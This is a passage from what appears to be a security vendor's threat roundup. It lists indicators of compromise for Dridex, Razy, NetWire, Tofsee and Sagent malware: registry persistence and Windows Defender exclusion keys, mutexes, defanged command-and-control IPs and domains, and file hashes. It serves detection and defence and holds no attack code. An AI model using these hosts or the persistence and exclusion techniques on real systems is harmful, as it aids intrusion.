170f8b900b31d3bcdf5e97d870a4b791c7e28754b15b7c90c4e835c2f7d579b7 22c10541cffa8a6c504202fe909fdbaa87375427fb2918ac1ab78a0656a886f0 26c501cea49207f9482fa293ed361c2bb4c163ed6c0a8cf309aa21624570f0ba 2c5c0a1b1998c1686eb2cc6654681aa933eb123feb972110cb2ddd91ab188429 3247f44c8c5bd8707c2a78e71ae03cc4a98845e1af8f7e283ea0189bf2c578bf 7d97d4c51ba4ad8a562264a9a0f8a09165123eeab47b74370f116778e9507cdf 95ee0f3243a2202f706bd45aaa2d27614059773ecb978671324560dc87fa6c03 9b71918c0db320b9b7ae6501f7b898082678480825b24d6c863bc1c017291db5 9f8aeec6db5f0220c88f6b90777c17f52a0219a5581cd586931782a975d1e068 ae560bec5699185818aa31178b20782fdb5113c202ac29ac9e6e26a4a2ccc091 bbab2020a80bf96b5784d94a395f9239127389e114799d3de605e0a13f0a7f91 c93ab8787073bbbc9cd37a121fa63b1eb782f547ed3a2085c0b09ca3a7549dee d635e095a8694027c0523c7b0ec13409daa295afb99eb40395a3794a948479a5 d7e9dd938f44a2be9163002868973d34bb445ffd008bc007493ee271661fc691 de4ff1ec4bdd8662185ab8776e9ca1a898a402d7c794b8b6f7d4b481a56e3a2b e282e081f44f468e9f12421833b9db629f788b583cc050bf945cb3067be916ae eaab484d0f2cfa0ba4e2ffe301f08e5a2f515195131f023bd8d69b8acafd5bb4 f1265e6373975143d1b68cc5ddde073a615531133a43cc789b425e3d318bd159 f979b407999143cd0d22e46cca3405a14dd0ddb6d022c79aa0f399c7a0b1db9f `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-xHZr1vHxCa0/Xf0EIRPg2YI/AAAAAAAADCs/SNyaOhLXyOUtTbJPmz36uZPCj5QJGQQFgCLcBGAsYHQ/s1600/9b71918c0db320b9b7ae6501f7b898082678480825b24d6c863bc1c017291db5_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-RnOUJi4vVao/Xf0ENJ9wspI/AAAAAAAADCw/dBOVQQK_bPsU24tiRiB45k7jhOi0vJi2gCLcBGAsYHQ/s1600/9b71918c0db320b9b7ae6501f7b898082678480825b24d6c863bc1c017291db5_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Dridex-7447905-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: trkcore ` | 16 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: DisableTaskMgr ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0 \nValue Name: CheckSetting ` | 16 \nMutexes | Occurrences \n---|--- \n`2XzfQtwuWo` | 2 \n`6K6du14uPy` | 2 \n`Pl97gmRo4e` | 2 \n`Rn0BgZV5LS` | 2 \n`VdM3QqPmEf` | 2 \n`dfSE5V35Cq` | 2 \n`h7l6vKPM9o` | 2 \n`qlxcdn1ONT` | 2 \n`8Uxj8bcq52` | 1 \n`YCQp73aCwI` | 1 \n`A9GTS5Q4V7` | 1 \n`hMRRcbdYM5` | 1 \n`Oa0iwlf5sY` | 1 \n`ogQ7oifBn6` | 1 \n`jZKilZdPlc` | 1 \n`qBGGGgXckD` | 1 \n`l4ibeg830v` | 1 \n`wOMqV2KpkO` | 1 \n`7blYqMoYMu` | 1 \n`3YLHr362i4` | 1 \n`E2Z6XqeW5y` | 1 \n`SUFSEHTYOK` | 1 \n`Jm43Qhf6mW` | 1 \n`SbwW51fbso` | 1 \n`OM3OWBjT4C` | 1 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`172[.]217[.]10[.]238` | 16 \n`104[.]20[.]68[.]143` | 12 \n`104[.]20[.]67[.]143` | 4 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`pastebin[.]com` | 16 \n`www[.]riirnqa3el[.]com` | 2 \n`www[.]tcofbii6gc[.]com` | 2 \n`www[.]xkwkb7vwyc[.]com` | 2 \n`www[.]luzbvsguu7[.]com` | 2 \n`www[.]e2vqnpqnxa[.]com` | 2 \n`www[.]ddwnd8uazb[.]com` | 2 \n`www[.]yg1ihyzjlx[.]com` | 2 \n`www[.]k3okzy7fbv[.]com` | 2 \n`www[.]5rmqghqote[.]com` | 1 \n`www[.]sbbvxwzjds[.]com` | 1 \n`www[.]lfrmipbwhf[.]com` | 1 \n`www[.]5tmjtihjrd[.]com` | 1 \n`www[.]99z7gq8bpa[.]com` | 1 \n`www[.]fn8bcbak8g[.]com` | 1 \n`www[.]j3hh3nvc1x[.]com` | 1 \n`www[.]q6rbctmtup[.]com` | 1 \n`www[.]6y1kayw2zo[.]com` | 1 \n`www[.]cngy66afzf[.]com` | 1 \n`www[.]xwra4vfpbm[.]com` | 1 \n`www[.]xp9isgvq38[.]com` | 1 \n`www[.]3upvufuqla[.]com` | 1 \n`www[.]phtetocd0l[.]com` | 1 \n`www[.]6komu134jz[.]com` | 1 \n`www[.]cmckmtegzm[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`<malware cwd>\\old_<malware exe name> (copy)` | 13 \n \n#### File Hashes\n\n` 01568fc89054049b9f4c65271186513fa9406e5bcaddd2583fa55abea453f3aa 0a07af4ec8798650f1e578f7e48df97980cf18074d2cc8b17955bb129c44607e 2440f0be01bed503a0a4315e8f253d6559063c7dd3dfd7e28379b23cc9fe3929 25effe96a8c27444dac8ff4ff13f75bc56c351faa74ddd0b217bf6c5f8202cbc 282c63152fdf124cba6c392874c96e670ce019b8566c1cba18475701ce06fbac 4d7589c590b5b0e69c5f08c7664bf658fe340b47022299337e9ec0ccf604426e 6b0ab0fb5437d31cef43d3b0cb989832b3d42d4d1c115d2180ffa0e25d6e0be3 6fcbcc1c24bf20ea3dfff5bfad8d0c38e60e46d1c9cbf254d845c58d4cecd1c9 878fd0aa3f953d35e89d4cf6b52183aa3cc0a1ab244665a4262189c065ce04ce 87dabcb18d67440cf631479d6ae1bacb32d82704c3c54e0305c370cd3f122512 a51d3150053e1a9d2176e98f0000acb572ecbe7c33ae596ab9cdfd4a05470b8c a71838cb33ea89f9e3f3201825b7129b8a61f112d946bf9b7671f2af901a07c1 ac29341c883ff743a3213050314bcfe0abffa366fec2abc09434d789bf836bcd b82c549b351a01839d6e3cc9ca60f1aaed2478799f373bcae604b6ede0e0c4e6 bb819890507c80a1cf9e83808d451a00fdae2fb43b1881b3806093bba32c1a8a f8b9bbc15f8697772d577944686a9b9c61547b992d156d0901293b438f359306 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-P-SobapiwkE/Xf0EcT31AQI/AAAAAAAADC4/7ez78ZjpDCgq3ACSop55BgdpiBGl6M3XACLcBGAsYHQ/s1600/01568fc89054049b9f4c65271186513fa9406e5bcaddd2583fa55abea453f3aa_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-lcorVe4U7AE/Xf0EhZzbtDI/AAAAAAAADDA/HZ2iExAqrbwrFY6J1GQ0BHb3gsqP2EGFwCLcBGAsYHQ/s1600/4d7589c590b5b0e69c5f08c7664bf658fe340b47022299337e9ec0ccf604426e_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Razy-7450491-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: None ` | 10 \nMutexes | Occurrences \n---|--- \n`frenchy_shellcode_006` | 10 \n`Global\\{259ce387-0d2a-4287-8147-d7e9dfdbdca4}` | 10 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`79[.]134[.]225[.]121` | 10 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`jogodo[.]duckdns[.]org` | 10 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5` | 10 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\Logs` | 10 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\Logs\\Administrator` | 10 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\run.dat` | 10 \n`%APPDATA%\\None` | 10 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\catalog.dat` | 4 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\settings.bin` | 4 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\storage.dat` | 4 \n \n#### File Hashes\n\n` 06b47808b96d08f6ef2089ff0d8eed4a9d448d5e6ebc4fe86321cfaecb774bc0 0815f50eb9877530cdcc6a30e551772d0c4807e2105e7cc5ecd3b510d7d3a019 0950e389cce1b3be7140f1a9ba2ddd6a677fda7fb50020bfc15d80b9aac8ccec 7e0c1895e8a080c7db4faca83b354d5af326920ce4534658e0c947f61328b468 a3bcf7816ef93cacc688c6b7bebac3b46d6826c85cfd215d5da279af11e509ae cf37f002c857a43c1d45189a68368ed643dc506c0260f4fe436d12e4e2b2d22d d2cf31b477c11ba5cb39a341fc7bedddbf1a7ec9541b105bab8e0022849a88c9 dc0714b70cb172c05ccb08424163e8932add81a498b55a556feb706cb80ffc13 f2d9a6acc6b09b4027dc558a268036a1213deecefae9952670bff42a481daaba f8a661f4823d529c13c7e2698f67aa3a00ed9a27f59e810b75cb4ead41dc3cf2 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-C5bOmi6wuVI/Xf0E0pMusxI/AAAAAAAADDM/DgO-Y8Tnpjo5x_73EK3qvEZL5Z0wzB0CACLcBGAsYHQ/s1600/f2d9a6acc6b09b4027dc558a268036a1213deecefae9952670bff42a481daaba_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-QWprkvx3V80/Xf0E6tbbHaI/AAAAAAAADDQ/JGaRh_LZzNEwhA65VYx2SQNNnSZiYop7ACLcBGAsYHQ/s1600/06b47808b96d08f6ef2089ff0d8eed4a9d448d5e6ebc4fe86321cfaecb774bc0_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.NetWire-7454096-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: task ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: Registry Key Name ` | 25 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\ENUM\\SW\\\\ASYNCMAC \nValue Name: CustomPropertyHwIdKey ` | 1 \nMutexes | Occurrences \n---|--- \n`-` | 25 \n`KYIMEShareCachedData.MutexObject.Administrator` | 8 \n`KYTransactionServer.MutexObject.Administrator` | 8 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`85[.]206[.]175[.]225` | 25 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\~$BOSCH.xlsx` | 25 \n`%TEMP%\\Install\\Settings.ini` | 25 \n`%TEMP%\\BOSCH.xlsx` | 25 \n`%TEMP%\\Install` | 25 \n`%TEMP%\\Install\\EXCEL.exe` | 25 \n`%TEMP%\\Install\\EXCEL.vbs` | 25 \n \n#### File Hashes\n\n` 04e12a8dcf9e8f041cf1b5b7f8f48a832df5fd607bf810fb28933fbc188a8c4b 0d9bedadc3e9edbc3b84c20a651d1e0a23609e4a7f039ec36c67276e90eed205 13047457fd3aca8c5d0ce5f165ea513cbdcd128a4e0de5b7322b895e1188f680 13a210e2e5527d08b6018f2463056f1d31011ed10e696b26e10482a4b09045f6 1e4e92c1d2b131e7710726282a014c014089a61bf93f7bd27b0689e4faef0d92 23804d31eb2d20e90df50559281008425b584a77fad856dce360400292bc6a80 291b26c6629d51d69e7856d22f80202b7a97f0a0f364adab27f16006e77d2df2 2e8e1ad0e72ecfc4cef418a8bc25095c4b0893a561c446a6aa1b8fe56c780d8c 36115f2ed9027f14643f000815ec615d44b97e3fb5c14cc0b67fcb9e784d3bda 3ad37750ccdb9ce0a82997c591d7842d9cee5722fc03219d0cf51f6cf7ddcc00 541e9bb6c2ff220ba15fd731000327f54ca8eae9e3df4d3e4193f50bf4f5f63b 5bf1aead7b5e89d92227d0e1daa019c0927de54faad212c35775d79f1c7b5d39 5f738f026c6f20f0d7ea5808ce96f14dbcb21f47b7b98d60e577a09d43d69071 6626bc4952d2a8cf839a47a4ada71ae877b7b89ac230821d9f5f17462eef4f4c 68252e2eb44e02032d53c42fe4b4c3ed6b8773f60aa78ebb7e6d34ee51ad32bc 68aaa21c0a7e40ba3bbc90abd3d9dd259d6c21d354d219b91ccd61e5c3b52089 68fe9505234da0d57d8a6c4898a1948574698fd5d5ddd9222efad0018d3adf3c 6fca62b51ce59dbf722f5f7d242f26c09b7b02cebde3d9b8db7feacc9d76da1a 7697945d1d3d95f66f3337329d8142f709fd153ead6ac8adfce7975b8572ad04 79a505ca4c4497351ee7cdd599212bf22979421f1055527bc11797d49b8ab907 7a291dffa29a8ca2f094af686ba0c8ceff4d432d10e601273f8b9a8779899e48 88edc5c751377aaf23028562d4a979ff2ca95b61d3d128fa42b64e68e42e20b2 895c0c05ba64cbf70bc8a9587194497b3c93f53cb9e17edcaf7d506a1f58b195 8bd10e751e7df59c1ba91a71bbeadbe5dfa12cb75d0fc7fdf65007703745e31c 8f7abac012c0016d87e3f40e14cdae185193aa8a6bfcb3810c010eab9ec495c6 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-YyGR5PJVZXo/Xf0FJ8VcFpI/AAAAAAAADDY/w2Z2J2WIBZo3z1vS43H9ZzETytYgNmzDwCLcBGAsYHQ/s1600/1e4e92c1d2b131e7710726282a014c014089a61bf93f7bd27b0689e4faef0d92_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-uWi5I8oOgg8/Xf0FOc-g3NI/AAAAAAAADDg/p5h-4gAhZb0XtO0GrDRVrdLf8If2Gg72gCLcBGAsYHQ/s1600/1e4e92c1d2b131e7710726282a014c014089a61bf93f7bd27b0689e4faef0d92_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.Tofsee-7450732-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 16 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config1 ` | 16 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config0 ` | 16 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config2 ` | 14 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config3 ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 12 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config4 ` | 8 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\exlrqyet ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\athnmuap ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\tmagfnti ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\xqekjrxm ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\gzntsagv ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\ibpvucix ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\jcqwvdjy ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\piwcbjpe ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\buionvbq ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\slzfemsh ` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`69[.]55[.]5[.]250` | 16 \n`43[.]231[.]4[.]7` | 16 \n`85[.]114[.]134[.]88` | 16 \n`239[.]255[.]255[.]250` | 14 \n`46[.]4[.]52[.]109` | 14 \n`192[.]0[.]47[.]59` | 14 \n`64[.]233[.]186[.]26/31` | 14 \n`173[.]194[.]66[.]26/31` | 14 \n`46[.]28[.]66[.]2` | 14 \n`78[.]31[.]67[.]23` | 14 \n`188[.]165[.]238[.]150` | 14 \n`93[.]179[.]69[.]109` | 14 \n`176[.]9[.]114[.]177` | 14 \n`67[.]195[.]228[.]110/31` | 13 \n`98[.]136[.]96[.]76/31` | 13 \n`67[.]195[.]204[.]72/30` | 13 \n`104[.]44[.]194[.]232/30` | 12 \n`98[.]136[.]96[.]74/31` | 12 \n`172[.]217[.]197[.]26/31` | 12 \n`98[.]136[.]96[.]92/31` | 12 \n`172[.]217[.]10[.]67` | 11 \n`209[.]85[.]202[.]26/31` | 11 \n`188[.]125[.]72[.]74` | 11 \n`213[.]205[.]33[.]61` | 10 \n`65[.]55[.]37[.]104` | 10 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]in-addr[.]arpa` | 16 \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 16 \n`schema[.]org` | 14 \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 14 \n`250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org` | 14 \n`mta5[.]am0[.]yahoodns[.]net` | 14 \n`250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net` | 14 \n`whois[.]iana[.]org` | 14 \n`250[.]5[.]55[.]69[.]bl[.]spamcop[.]net` | 14 \n`whois[.]arin[.]net` | 14 \n`250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org` | 14 \n`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 14 \n`irina94[.]rusgirls[.]cn` | 14 \n`anastasiasweety[.]rugirls[.]cn` | 14 \n`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 13 \n`mx-aol[.]mail[.]gm0[.]yahoodns[.]net` | 13 \n`coolsex-finders6[.]com` | 13 \n`ipinfo[.]io` | 12 \n`aol[.]com` | 12 \n`eur[.]olc[.]protection[.]outlook[.]com` | 11 \n`www[.]google[.]co[.]uk` | 11 \n`msn-com[.]olc[.]protection[.]outlook[.]com` | 9 \n`web[.]de` | 9 \n`mx[.]xtra[.]co[.]nz` | 9 \n`xtra[.]co[.]nz` | 9 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\SysWOW64\\config\\systemprofile` | 16 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile:.repos` | 16 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-z]{8}'>` | 16 \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 16 \n`%HOMEPATH%` | 11 \n`%System32%\\<random, matching '[a-z]{8}\\[a-z]{6,8}'>.exe (copy)` | 11 \n`%TEMP%\\gidjcpz.exe` | 1 \n \n#### File Hashes\n\n` 0d55086e8221871f10f204087a165112434c8db294fbedfaa6de7d2a11b55943 2b069b741778d0e16246f7a2da8738b6b21e8004cb713efc8ce845b37fc94478 2d3fbb1b7d4da1af0e07fa6fd11f1e946815ce39b3b63fdf299e4acaa9d92ff1 2e02f61e0a99dceab6e026e2e9efb9dcd2466e41e56f3f659f0ee1a4670d502d 59dcd52b18a4badf7803940e05842a52b6af9fa95fdb2ddee26145d6a393c277 60d0cdba9b81f58e4f926e1bbe357d7415771f42819acb79fa4d02313fdac8b9 886ff6f03c5e0a77cf10cbd1461e1ee666901cfdfe26854610b9deef5450bf00 8d9142db7706f1be42d3d048cea675ca6caa5dffd562595124f4e5c95771480a 9403677dc99940afcced72ed29b04a0434417883d929164d279606e9df4fe1db 94568d7086b812c0017455b1d05968726ffd137d8831ddb607fbae5d454ed073 9af4c0927e3565f27e96a8b7fb26ff0ea2d22f6f2a0bd0c6de9f993378024791 a76e2be2b3730324299bd32c7da5a04f494f79a69aeab9649aa53984c852e49a b926e4920a7b454553f73565ce89023af72ae4b6720da4110eb7fa85ff0310bf cbd7701ebc908b3ab059a9d83a3be110e8f63b0e005a41d5e0788044a65f6a14 d9520acee8a753230b372d725a3d4ba4d3caf27fd1eee7d8a8c9779424f2c077 fd1d5902802ada2adc69f071535b1523e2e3580ec2ea960e03a875687913d5de `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-7MSI84-8D-s/Xf0FfRx_qKI/AAAAAAAADDs/P3bx3KcYrKASbJ8u91VCygre0pbv-IWkwCLcBGAsYHQ/s1600/60d0cdba9b81f58e4f926e1bbe357d7415771f42819acb79fa4d02313fdac8b9_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-I9v-Uc_HX0w/Xf0FjyXzbUI/AAAAAAAADDw/mBZ3-3X3frcKfDG4a4NPv_sacbSu27aygCLcBGAsYHQ/s1600/60d0cdba9b81f58e4f926e1bbe357d7415771f42819acb79fa4d02313fdac8b9_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-eFo5vK1_c60/Xf0Fo4MLP5I/AAAAAAAADD0/QpWgifGLyoctq2UaFlmqvSeIoijRryWiQCLcBGAsYHQ/s1600/a76e2be2b3730324299bd32c7da5a04f494f79a69aeab9649aa53984c852e49a_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Doc.Downloader.Sagent-7454309-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\INTERFACE\\{BEF6E003-A874-101A-8BBA-00AA00300CAB} ` | 30 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyEnable ` | 12 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyServer ` | 12 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyOverride ` | 12 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoConfigURL ` | 12 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoDetect ` | 12 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Type ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Start ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ErrorControl ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ImagePath ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: DisplayName ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: WOW64 ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ObjectName ` | 10 \n`<HKCR>\\LOCAL SETTINGS\\MUICACHE\\23\\52C64B7E \nValue Name: LanguageList ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: DisplayName ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: WOW64 ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: ObjectName ` | 2 \n`<HKLM>\\SOFTWARE\\CLASSES\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-102075206B43} ` | 2 \n`<HKLM>\\SOFTWARE\\CLASSES\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-102075206B43}\\2.0 ` | 2 \n`<HKLM>\\SOFTWARE\\CLASSES\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-102075206B43}\\2.0\\FLAGS ` | 2 \n`<HKLM>\\SOFTWARE\\CLASSES\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-102075206B43}\\2.0\\0 ` | 2 \n`<HKLM>\\SOFTWARE\\CLASSES\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-102075206B43}\\2.0\\0\\WIN32 ` | 2 \n`<HKLM>\\SOFTWARE\\CLASSES\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-102075206B43}\\2.0\\HELPDIR ` | 2 \n`<HKCR>\\TYPELIB\\{C4EDCADC-BC75-481F-8A5F-102075206B43} ` | 2 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 10 \n`Global\\M98B68E3C` | 10 \n`Global\\IC019706B` | 2 \n`Global\\MC019706B` | 2 \n`Global\\SyncRootManager` | 2 \n`Local\\C9E8AF12-FA27-4748-EC04-38CA71239739_RegisterDevice` | 2 \n`Global\\RecentDocumentsUpdate` | 2 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`100[.]104[.]45[.]107` | 18 